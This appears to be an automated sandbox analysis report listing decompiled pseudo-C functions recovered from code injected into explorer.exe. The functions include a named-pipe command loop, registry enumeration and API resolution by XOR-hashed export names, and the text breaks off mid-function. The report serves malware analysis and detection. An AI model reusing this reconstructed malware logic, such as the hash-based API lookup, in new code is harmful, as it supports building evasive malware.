                            										_t115 = _t115 + 0x10;
                            										_v172 = _t61;
                            										E000894B7( &_v24);
                            									}
                            									_t82 = _v12;
                            								}
                            							}
                            							_t105 =  *0x9e724; // 0x2870020
                            							E000896CA( &_v168,  &(_t105[4]), 0x80);
                            							_push(0x84);
                            							_push( &_v172);
                            							_push(2);
                            							goto L33;
                            						} else {
                            							_t65 = _t47 - 3;
                            							if(_t65 == 0) {
                            								_push(_t113);
                            								_push(_t113);
                            								_t108 = 5;
                            								E0008C319(_t108);
                            								 *0x9e758 = 1;
                            								_t82 = 1;
                            								_v12 = 1;
                            							} else {
                            								_t68 = _t65;
                            								if(_t68 == 0) {
                            									_t70 = E0008F79F( &_v8);
                            									goto L13;
                            								} else {
                            									_t72 = _t68 - 1;
                            									if(_t72 == 0) {
                            										E0008F79F( &_v8);
                            										goto L16;
                            									} else {
                            										_t76 = _t72 - 1;
                            										if(_t76 == 0) {
                            											_t70 = E0008F7C1( &_v8);
                            											L13:
                            											if(_t70 == 0) {
                            												_push(_t113);
                            												_push(_t113);
                            												_push(0xa);
                            											} else {
                            												_push(_v8);
                            												_push(_t70);
                            												_push(5);
                            											}
                            											_pop(_t109);
                            											E0008C319(_t109);
                            										} else {
                            											if(_t76 == 1) {
                            												E0008F7C1( &_v8);
                            												L16:
                            												_push(4);
                            												_push( &_v8);
                            												_push(5);
                            												L33:
                            												_pop(_t107);
                            												E0008C319(_t107);
                            												_t115 = _t115 + 0xc;
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            					DisconnectNamedPipe( *0x9e674);
                            					if(_t82 == 0) {
                            						continue;
                            					}
                            					break;
                            				}
                            				return 0;
                            			}

                            APIs
                            • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                            • GetLastError.KERNEL32 ref: 000832D0
                              • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(00000214), ref: 0008C35F
                            • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                            • String ID:
                            • API String ID: 2389948835-0
                            • Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                            • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                            • Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                            • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 385 861b4-861f9 memset call 88604 388 861ff-86211 call 88604 385->388 389 86363-86369 385->389 388->389 392 86217-86234 RegOpenKeyExW 388->392 393 8623a-8626d 392->393 394 86333-86337 392->394 400 8627f-86284 393->400 401 8626f-8627a 393->401 395 86339-8633e 394->395 396 86344-8635b call 8861a * 2 394->396 395->396 404 86360 396->404 400->394 403 8628a 400->403 401->394 406 8628d-862dc memset * 2 403->406 404->389 408 862de-862ee 406->408 409 86326-8632d 406->409 411 862f0-86304 408->411 412 86323 408->412 409->394 409->406 411->412 414 86306-86313 call 8c392 411->414 412->409 417 8631c-8631e call 8b1b1 414->417 418 86315-86317 414->418 417->412 418->417
                            C-Code - Quality: 80%
                            			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                            				void* _v8;
                            				int _v12;
                            				int _v16;
                            				int _v20;
                            				char _v24;
                            				char _v28;
                            				void* _v32;
                            				void* _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v56;
                            				void _v576;
                            				intOrPtr _t63;
                            				intOrPtr _t72;
                            				intOrPtr _t80;
                            				intOrPtr _t81;
                            				intOrPtr _t82;
                            				signed int _t85;
                            				intOrPtr _t87;
                            				int _t89;
                            				intOrPtr _t90;
                            				intOrPtr _t92;
                            				void* _t96;
                            				void* _t97;
                            				void* _t98;
                            				void* _t99;
                            				void* _t100;
                            				void* _t108;
                            
                            				_t108 = __fp0;
                            				_t96 = __edx;
                            				_t89 = 0;
                            				_v8 = 0;
                            				memset( &_v576, 0, 0x208);
                            				_v28 = 0x104;
                            				_v20 = 0x3fff;
                            				_v16 = 0;
                            				_t98 = E00088604(0x3fff);
                            				_t100 = _t99 + 0x10;
                            				_v32 = _t98;
                            				if(_t98 == 0) {
                            					L18:
                            					return 0;
                            				}
                            				_t97 = E00088604(0x800);
                            				_v36 = _t97;
                            				if(_t97 == 0) {
                            					goto L18;
                            				}
                            				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                            					L15:
                            					if(_v8 != 0) {
                            						_t63 =  *0x9e68c; // 0x286fab8
                            						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
                            					}
                            					E0008861A( &_v32, 0x3fff); // executed
                            					E0008861A( &_v36, 0x800); // executed
                            					goto L18;
                            				}
                            				_push( &_v56);
                            				_push( &_v40);
                            				_push( &_v44);
                            				_push( &_v48);
                            				_push( &_v24);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push( &_v28);
                            				_push( &_v576);
                            				_t72 =  *0x9e68c; // 0x286fab8
                            				_push(_v8);
                            				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                            					__eflags = _v24;
                            					if(_v24 == 0) {
                            						goto L15;
                            					}
                            					_v12 = 0;
                            					do {
                            						memset(_t97, 0, 0x800);
                            						memset(_t98, 0, 0x3fff);
                            						_t100 = _t100 + 0x18;
                            						_v20 = 0x3fff;
                            						_v16 = 0x800;
                            						 *_t98 = 0;
                            						_t80 =  *0x9e68c; // 0x286fab8
                            						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                            						__eflags = _t81;
                            						if(_t81 == 0) {
                            							_t82 =  *0x9e690; // 0x286fb90
                            							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                            							__eflags = _t90;
                            							if(_t90 != 0) {
                            								_t92 =  *0x9e68c; // 0x286fab8
                            								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                            								__eflags = _a16;
                            								if(_a16 != 0) {
                            									_t85 = E0008C392(_t90);
                            									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                            									if(__eflags == 0) {
                            										__eflags = 0;
                            										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                            									}
                            									E0008B1B1(_t90, _t96, __eflags, _t108);
                            								}
                            							}
                            							_t89 = _v12;
                            						}
                            						_t89 = _t89 + 1;
                            						_v12 = _t89;
                            						__eflags = _t89 - _v24;
                            					} while (_t89 < _v24);
                            					goto L15;
                            				}
                            				_t87 =  *0x9e68c; // 0x286fab8
                            				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                            				goto L15;
                            			}

                            APIs
                            • memset.MSVCRT ref: 000861D2
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                            • memset.MSVCRT ref: 00086295
                            • memset.MSVCRT ref: 000862A2
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$AllocateHeapOpen
                            • String ID:
                            • API String ID: 2508404634-0
                            • Opcode ID: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                            • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                            • Opcode Fuzzy Hash: 8a8df3ec20745d9b8db935e1207a51dcdf7b99798a4571e88c74bfd6093f7efc
                            • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 420 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 423 8b07c-8b07e 420->423 424 8b0ab-8b0dd call 8c392 lstrcpynW 423->424 425 8b080-8b094 call 8bb8d 423->425 425->424 429 8b096-8b0a7 425->429 429->424
                            C-Code - Quality: 87%
                            			E0008B012(void* __ecx, WCHAR* __edx) {
                            				int _v8;
                            				void _v528;
                            				char _v1046;
                            				void _v1048;
                            				intOrPtr _t21;
                            				intOrPtr* _t26;
                            				void* _t27;
                            				intOrPtr _t33;
                            				intOrPtr _t36;
                            				void* _t39;
                            				intOrPtr _t40;
                            				WCHAR* _t47;
                            				void* _t49;
                            
                            				_t39 = __ecx;
                            				_v8 = 0x104;
                            				_t47 = __edx;
                            				memset( &_v1048, 0, 0x208);
                            				memset( &_v528, 0, 0x208);
                            				_t21 =  *0x9e698; // 0x286fbc8
                            				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                            				_t49 = E0008B946(_t39);
                            				_t26 =  *0x9e6b8; // 0x286fbd8
                            				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                            				if(_t27 == 0) {
                            					_t33 =  *0x9e688; // 0xb0000
                            					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                            						_t36 =  *0x9e698; // 0x286fbc8
                            						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                            					}
                            				}
                            				_t40 =  *0x9e684; // 0x286f8f0
                            				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                            				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
                            				return 1;
                            			}

                            APIs
                            • memset.MSVCRT ref: 0008B037
                            • memset.MSVCRT ref: 0008B045
                            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
                              • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                              • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                              • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                            • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                            • String ID:
                            • API String ID: 3158470084-0
                            • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                            • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                            • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                            • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 432 8bf37-8bf66 RegOpenKeyExW 433 8bf68-8bf6a 432->433 434 8bf6c-8bf8a RegQueryValueExW 432->434 435 8bfda-8bfdc 433->435 436 8bf8c-8bf9c call 88604 434->436 437 8bfc7-8bfca 434->437 436->437 443 8bf9e-8bfb8 RegQueryValueExW 436->443 438 8bfcc-8bfd1 437->438 439 8bfd7 437->439 438->439 441 8bfd9 439->441 441->435 444 8bfba-8bfc6 call 8861a 443->444 445 8bfdd-8bfea RegCloseKey 443->445 444->437 445->441
                            C-Code - Quality: 100%
                            			E0008BF37(short* __edx, short* _a4) {
                            				void* _v8;
                            				int _v12;
                            				int _v16;
                            				char* _v20;
                            				char* _t30;
                            				intOrPtr _t31;
                            				char* _t49;
                            
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                            					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                            						L6:
                            						if(_v8 != 0) {
                            							_t31 =  *0x9e68c; // 0x286fab8
                            							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                            						}
                            						_t30 = 0;
                            						L9:
                            						return _t30;
                            					}
                            					_t49 = E00088604(_v12);
                            					_v20 = _t49;
                            					if(_t49 == 0) {
                            						goto L6;
                            					}
                            					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                            						RegCloseKey(_v8);
                            						_t30 = _t49;
                            						goto L9;
                            					}
                            					E0008861A( &_v20, 0xfffffffe);
                            					goto L6;
                            				}
                            				return 0;
                            			}

                            APIs
                            • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                            • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                            • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                            • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID:
                            • API String ID: 1586453840-0
                            • Opcode ID: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                            • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                            • Opcode Fuzzy Hash: 7e5c6c0b12421700877791a8b1243c8e4f1c457698047c2e59d80b208f0cb83c
                            • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 448 8be9b-8bec3 RegOpenKeyExA 449 8bec9-8bee6 RegQueryValueExA 448->449 450 8bec5-8bec7 448->450 452 8bee8-8bef7 call 88604 449->452 453 8bf21-8bf24 449->453 451 8bf33-8bf36 450->451 452->453 458 8bef9-8bf13 RegQueryValueExA 452->458 455 8bf31 453->455 456 8bf26-8bf2e RegCloseKey 453->456 455->451 456->455 458->453 459 8bf15-8bf1a 458->459 459->453 460 8bf1c-8bf1f 459->460 460->453
                            C-Code - Quality: 100%
                            			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                            				void* _v8;
                            				int _v12;
                            				int _v16;
                            				intOrPtr* _t43;
                            				char* _t46;
                            
                            				_t46 = 0;
                            				_v8 = 0;
                            				_v16 = 0;
                            				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                            					return 0;
                            				}
                            				_v12 = 0;
                            				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                            					_t46 = E00088604(_v12 + 1);
                            					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                            						_t43 = _a12;
                            						if(_t43 != 0) {
                            							 *_t43 = _v12;
                            						}
                            					}
                            				}
                            				if(_v8 != 0) {
                            					RegCloseKey(_v8);
                            				}
                            				return _t46;
                            			}

                            APIs
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0286FC18,00000000,?,00000002), ref: 0008BEBE
                            • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BEE1
                            • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0008BF0E
                            • RegCloseKey.KERNEL32(?,?,00000002), ref: 0008BF2E
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID:
                            • API String ID: 1586453840-0
                            • Opcode ID: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                            • Instruction ID: a503bc69bf056dc60d578d60e72969ac8cbe77b2aa393cc8f9a4dd6054926014
                            • Opcode Fuzzy Hash: 7a4cdaf7386973441e4760f86288c6c940ee8b5e5eb7e5f1cc676981f8255861
                            • Instruction Fuzzy Hash: 0921A4B5A00148BF9B61DFA9DC44DAEBBF8FF98740B1141A9B945E7211D7309E00DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 78%
                            			E00085631(void* __edx, void* __edi) {
                            				char _v44;
                            				void* _t8;
                            				intOrPtr _t11;
                            				intOrPtr _t14;
                            				intOrPtr _t17;
                            				intOrPtr _t18;
                            				void* _t20;
                            				void* _t33;
                            				void* _t34;
                            				void* _t36;
                            				void* _t39;
                            				void* _t40;
                            				void* _t49;
                            				void* _t54;
                            
                            				_t54 = __edi;
                            				_t8 = E00089E66(0x3b); // executed
                            				if(_t8 != 0xffffffff) {
                            					L2:
                            					E0008980C(0x9e6c8);
                            					_t39 = 0x37; // executed
                            					E00089F06(_t39);
                            					_t11 =  *0x9e688; // 0xb0000
                            					_t40 = 0x3a; // executed
                            					E00089F06(_t40); // executed
                            					E0008E4C1(_t63);
                            					_t14 =  *0x9e688; // 0xb0000
                            					_t41 =  &_v44;
                            					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
                            					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
                            					_t17 =  *0x9e684; // 0x286f8f0
                            					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
                            					 *0x9e74c = _t18;
                            					if(_t18 != 0) {
                            						_t20 = CreateMutexA(0, 0, 0);
                            						 *0x9e76c = _t20;
                            						__eflags = _t20;
                            						if(_t20 != 0) {
                            							_t34 = E00088604(0x1000);
                            							_t52 = 0;
                            							 *0x9e770 = _t34;
                            							_t49 =  *0x9e774; // 0x2
                            							__eflags = _t34;
                            							_t41 =  !=  ? 0 : _t49;
                            							__eflags = _t41;
                            							 *0x9e774 = _t41; // executed
                            						}
                            						E0008153B(_t41, _t52); // executed
                            						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
                            						E00083017(); // executed
                            						E000831C2(0, __eflags); // executed
                            						E000829B1(); // executed
                            						E00083BB2(_t54, __eflags); // executed
                            						while(1) {
                            							__eflags =  *0x9e758; // 0x0
                            							if(__eflags != 0) {
                            								break;
                            							}
                            							E0008980C(0x9e750);
                            							_push(0x9e750);
                            							_push(0x9e750); // executed
                            							E0008279B();
                            							Sleep(0xfa0);
                            						}
                            						E00083D34();
                            						E00089A8E();
                            						E000834CB();
                            						_t33 = 0;
                            						__eflags = 0;
                            					} else {
                            						goto L3;
                            					}
                            				} else {
                            					_t36 = E00082DCB();
                            					_t63 = _t36;
                            					if(_t36 != 0) {
                            						L3:
                            						_t33 = 1;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            				return _t33;
                            			}

                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0
                              • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                              • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                            • Sleep.KERNELBASE(00000FA0), ref: 0008574A
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: 7xSa
                            • API String ID: 3249252070-3178854837
                            • Opcode ID: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                            • Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
                            • Opcode Fuzzy Hash: 3562f7877b88b9be417dacf07b104c639c27ee61355e5b92e6b06fab33a1451d
                            • Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 511 8dfad-8dfc4 512 8e021 511->512 513 8dfc6-8dfee 511->513 515 8e023-8e027 512->515 513->512 514 8dff0-8e013 call 8c379 call 8d400 513->514 520 8e028-8e03f 514->520 521 8e015-8e01f 514->521 522 8e041-8e049 520->522 523 8e095-8e097 520->523 521->512 521->514 522->523 524 8e04b 522->524 523->515 525 8e04d-8e053 524->525 526 8e063-8e074 525->526 527 8e055-8e057 525->527 529 8e079-8e085 LoadLibraryA 526->529 530 8e076-8e077 526->530 527->526 528 8e059-8e061 527->528 528->525 528->526 529->512 531 8e087-8e091 GetProcAddress 529->531 530->529 531->512 532 8e093 531->532 532->515
                            C-Code - Quality: 100%
                            			E0008DFAD(void* __ecx, intOrPtr __edx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				char _v92;
                            				intOrPtr _t41;
                            				signed int _t47;
                            				signed int _t49;
                            				signed int _t51;
                            				void* _t56;
                            				struct HINSTANCE__* _t58;
                            				_Unknown_base(*)()* _t59;
                            				intOrPtr _t60;
                            				void* _t62;
                            				intOrPtr _t63;
                            				void* _t69;
                            				char _t70;
                            				void* _t75;
                            				CHAR* _t80;
                            				void* _t82;
                            
                            				_t75 = __ecx;
                            				_v12 = __edx;
                            				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                            				if(_t41 == 0) {
                            					L4:
                            					return 0;
                            				}
                            				_t62 = _t41 + __ecx;
                            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                            				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                            				_t47 = 0;
                            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                            				_v8 = 0;
                            				_v16 = _t63;
                            				if(_t63 == 0) {
                            					goto L4;
                            				} else {
                            					goto L2;
                            				}
                            				while(1) {
                            					L2:
                            					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                            					_t51 = _v8;
                            					if((_t49 ^ 0x218fe95b) == _v12) {
                            						break;
                            					}
                            					_t73 = _v20;
                            					_t47 = _t51 + 1;
                            					_v8 = _t47;
                            					if(_t47 < _v16) {
                            						continue;
                            					}
                            					goto L4;
                            				}
                            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                            					return _t80;
                            				} else {
                            					_t56 = 0;
                            					while(1) {
                            						_t70 = _t80[_t56];
                            						if(_t70 == 0x2e || _t70 == 0) {
                            							break;
                            						}
                            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                            						_t56 = _t56 + 1;
                            						if(_t56 < 0x40) {
                            							continue;
                            						}
                            						break;
                            					}
                            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                            					if( *((char*)(_t56 + _t80)) != 0) {
                            						_t80 =  &(( &(_t80[1]))[_t56]);
                            					}
                            					_t40 =  &_v92; // 0x6c6c642e
                            					_t58 = LoadLibraryA(_t40); // executed
                            					if(_t58 == 0) {
                            						goto L4;
                            					}
                            					_t59 = GetProcAddress(_t58, _t80);
                            					if(_t59 == 0) {
                            						goto L4;
                            					}
                            					return _t59;
                            				}
                            			}


























                            APIs
                            • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                            • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: .dll
                            • API String ID: 2574300362-2738580789
                            • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                            • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                            • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                            • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            [Control-flow graph for function 00089B43: image not reproduced]
                            C-Code - Quality: 89%
                            			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
                            				void* _v8;
                            				int _v12;
                            				void* _v16;
                            				void* _v20;
                            				int _v24;
                            				void* _v28;
                            				char _v32;
                            				char _v36;
                            				int* _v40;
                            				int** _v44;
                            				void _v108;
                            				int* _t90;
                            				void* _t91;
                            				char* _t92;
                            				long _t96;
                            				int* _t97;
                            				intOrPtr _t98;
                            				int* _t101;
                            				long _t111;
                            				int* _t112;
                            				intOrPtr _t122;
                            				char* _t125;
                            				intOrPtr _t126;
                            				intOrPtr _t128;
                            				int* _t129;
                            				intOrPtr _t131;
                            				int* _t133;
                            				intOrPtr _t134;
                            				int* _t135;
                            				intOrPtr _t136;
                            				char* _t139;
                            				int _t143;
                            				int _t147;
                            				intOrPtr _t148;
                            				int* _t149;
                            				int* _t154;
                            				int** _t155;
                            				int* _t161;
                            				int* _t163;
                            				intOrPtr _t164;
                            				intOrPtr _t171;
                            				int _t176;
                            				char* _t177;
                            				char* _t178;
                            				char _t179;
                            				void* _t180;
                            				void* _t181;
                            				void* _t183;
                            
                            				_t176 = 0;
                            				_v24 = __edx;
                            				_t177 = 0;
                            				_v32 = __ecx;
                            				_v28 = 0;
                            				_v8 = 0x80000001;
                            				_v20 = 0;
                            				_t155 = E00088604(0x110);
                            				_v44 = _t155;
                            				if(_t155 != 0) {
                            					_t158 = _a4;
                            					_t155[0x42] = _a4;
                            					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
                            					_t161 = _v108;
                            					__eflags = _t161 - 0x61 - 0x19;
                            					_t90 = _t161;
                            					if(_t161 - 0x61 <= 0x19) {
                            						_t90 = _t90 - 0x20;
                            						__eflags = _t90;
                            					}
                            					_v108 = _t90;
                            					_t91 = E000895C7(0x4d2);
                            					_t163 = _v24;
                            					_v16 = _t91;
                            					__eflags = _t163;
                            					if(_t163 == 0) {
                            						L16:
                            						_t164 =  *0x9e688; // 0xb0000
                            						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
                            						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
                            							_push(_t176);
                            							_push( &_v108);
                            							_push("\\");
                            							_t92 = E00089292(_t91);
                            							_t181 = _t181 + 0x10;
                            							L20:
                            							_t177 = _t92;
                            							_v20 = _t177;
                            							goto L21;
                            						}
                            						_v24 = _t176;
                            						_v8 = 0x80000003;
                            						_t122 =  *0x9e68c; // 0x286fab8
                            						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
                            						__eflags = _v24 - _t177;
                            						if(_v24 == _t177) {
                            							goto L21;
                            						}
                            						_push(_t176);
                            						_push( &_v108);
                            						_t125 = "\\";
                            						_push(_t125);
                            						_push(_v16);
                            						_push(_t125);
                            						_t92 = E00089292(_v24);
                            						_t181 = _t181 + 0x18;
                            						goto L20;
                            					} else {
                            						_t126 =  *0x9e688; // 0xb0000
                            						_t128 =  *0x9e68c; // 0x286fab8
